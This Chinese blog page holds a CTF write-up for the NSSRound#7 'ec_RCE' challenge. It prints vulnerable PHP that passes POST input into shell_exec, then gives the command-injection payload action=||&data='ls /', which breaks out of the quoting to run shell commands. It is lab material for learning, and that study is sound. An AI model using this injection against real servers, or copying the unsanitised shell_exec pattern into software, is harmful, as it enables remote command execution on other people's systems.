当前位置: 首页 > article >正文

[NSSRound#7 Team]ec_RCE

article 2025/1/26 15:51:28

[NSSRound#7 Team]ec_RCE

解题

<?PHP
    
    if(!isset($_POST["action"]) && !isset($_POST["data"]))
        show_source(__FILE__);

    putenv('LANG=zh_TW.utf8'); 

    $action = $_POST["action"];
    $data = "'".$_POST["data"]."'";

    $output = shell_exec("/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar $action $data");
    echo $output;    
?>

shell_exec()函数,讲白了就是可以执行“”里的内容并保存到output里

前面的

/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar

看着挺长其实没有什么用,将其当成127.0.0.1就行

所以,直接使用管道符让后面的data进行命令执行,因为有‘’包裹data

我们也包裹一层,让其不影响传参

action=||&data='ls /'

http://www.kler.cn/a/428312.html

相关文章:

  • [SUCTF 2018]MultiSQL1
  • 数据结构——实验八·学生管理系统
  • RoHS 简介
  • ubuntu调用图形化网络测试工具
  • ASP.NET Core 6.0 如何处理丢失的 Startup.cs 文件
  • 【2025小年源码免费送】
  • 海外的bug-hunters,不一样的403bypass
  • DR、HIS、PACS的交互,以及与其他软件系统之间的交互
  • Python学习(一)—— 编程环境安装
  • 动手学深度学习-线性神经网络-1线性回归
  • 项目搭建:springboot,mybatis, maven
  • Elasticsearch入门之HTTP基础操作
  • 【数字信号处理】Z变换,离散时间信号z变换的定义,一些常用序列的Z变换
  • node.js与npm的版本与Vue2和Vue3版本运行,nvm的使用
  • Python 在同一/或不同PPT文档之间复制幻灯片
  • 修改MySQL存储路径
  • 【目标跟踪】DUT Anti-UAV数据集详细介绍
  • 使用TCP编程实现简单登录功能
  • 城电科技|光伏廊道是什么?安装光伏廊道有什么好处?
  • Plugin - 插件开发06_开源项目JPom中的插件实现机制
  • 如何批量去除 PDF 中的特定文字?5种批量去除pdf中特定文字的方法。
  • web斗地主游戏实现指北
  • Windows环境中Python脚本开机自启动及其监控自启动
  • 机器学习—测量纯度
  • qt QCryptographicHash详解
  • SQL中限制一定数量行的实现